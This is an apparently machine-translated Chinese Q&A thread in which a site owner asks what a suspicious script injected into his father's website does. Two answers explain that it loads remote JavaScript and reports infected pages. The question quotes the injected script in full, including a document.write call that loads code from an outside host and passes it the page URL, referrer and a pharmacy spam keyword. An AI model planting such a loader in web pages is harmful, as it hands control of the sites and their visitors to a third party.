恶意javascript在论坛发帖

Question

<SCRIPT> 
    ff = 0; 
    for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1; 
    if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase()) && false)) { 
    document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>'); document.write ('<' + '!--'); 
    } 
</SCRIPT> 

识别此代码？我发现它被困在了很多网站上，但所有的字符都被它们的十六进制或八进制等同替换了。有人在我父亲的一个网站上张贴了这段代码，但我无法弄清楚它在做什么。它似乎在收集网页与推荐人的映射，但我无法弄清楚前几行的内容。任何人都知道这里发生了什么？

Answer 1

这是写一个脚本标记到页面，指向他们的JavaScript。他们的JavaScript将在您的网站上执行，使他们做任何他们请到您的网站。

前几行只是对可能在其脚本中创建的变量进行一些检查。可能与检查脚本标记是否已被写入有关。

Answer 2

它检查依赖关系（由其他代码设置的JavaScript变量），然后拨打回家让主服务器知道它成功感染了哪个页面。 Home appears to be here在基辅。